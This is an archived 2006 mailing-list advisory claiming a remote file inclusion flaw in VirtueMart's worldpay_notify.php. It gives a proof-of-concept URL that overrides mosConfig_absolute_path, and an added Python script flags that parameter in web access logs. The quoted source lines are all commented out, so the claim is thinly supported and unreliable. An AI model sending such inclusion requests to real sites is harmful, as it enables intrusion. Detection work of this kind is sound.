Vulnerability Development mailing list archives
VirtueMart
From: t3rr0r1st () aria-security net
Date: 9 Sep 2006 00:41:16 -0000
#Aria-Security.net Advisory
#Discovered by: Dr.T3rr0r1st
#< www.Aria-security.net >
#Gr33t to: The-0utl4w & A.u.r.a & R@1D3N & Smok3r
#-----------------------------------------------------------
Software: VirtueMart
Link: virtumart.net
Attack method: Remote File Inclusion

Source :
//Set up the mailer to infor Warehouse of validated order
//require_once( $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php');
//$mail = new mosPHPMailer();
//$mail->PluginDir = $mosConfig_absolute_path . '/includes/phpmailer/';
//$mail->SetLanguage("en", $mosConfig_absolute_path . '/includes/phpmailer/language/');

Proof of Concept:
http://site.com/[path]/worldpay_notify.php?mosConfig_absolute_path=shell

Solution
contact me: Advisory () Aria-Security net
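
Added example, not part of the original post or of VirtueMart's code: a log check that flags requests carrying a `mosConfig_`-prefixed name in the query string, the pattern the proof of concept above uses. The common/combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Prefix of the configuration variable named in the advisory's parameter.
CONFIG_PREFIX = "mosconfig_"

def config_override_params(target):
    """Return (name, value) query pairs whose name maps to a mosConfig_ variable."""
    hits = []
    # parse_qsl percent-decodes names, so mosConfig%5Fabsolute%5Fpath is caught too.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # PHP reads name[key] as an element of variable "name" ...
        base = name.split("[", 1)[0].lstrip()
        # ... and converts dots and spaces in external variable names to "_".
        base = base.replace(".", "_").replace(" ", "_")
        # Case-insensitive on purpose: over-reporting is cheap in a log review.
        if base.lower().startswith(CONFIG_PREFIX):
            hits.append((name, value))
    return hits

def scan(lines):
    """Yield (client_ip, path, hits) for each log line carrying such a parameter."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        hits = config_override_params(m.group("target"))
        if hits:
            yield line.split(" ", 1)[0], urlsplit(m.group("target")).path, hits

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Sep/2006:00:50:01 +0000] "GET /shop/worldpay_notify.php?mosConfig_absolute_path=shell HTTP/1.1" 200 512',
    '192.0.2.11 - - [09/Sep/2006:00:51:12 +0000] "GET /shop/index.php?page=shop.browse&category_id=3 HTTP/1.1" 200 9120',
    '198.51.100.7 - - [09/Sep/2006:00:52:40 +0000] "GET /shop/worldpay_notify.php?mosConfig%5Fabsolute%5Fpath=x HTTP/1.1" 200 512',
    '198.51.100.8 - - [09/Sep/2006:00:53:05 +0000] "POST /shop/worldpay_notify.php HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, hits)
```

Only the query string is visible in an access log, so parameters sent in a POST body or cookie need a WAF or application-level check instead.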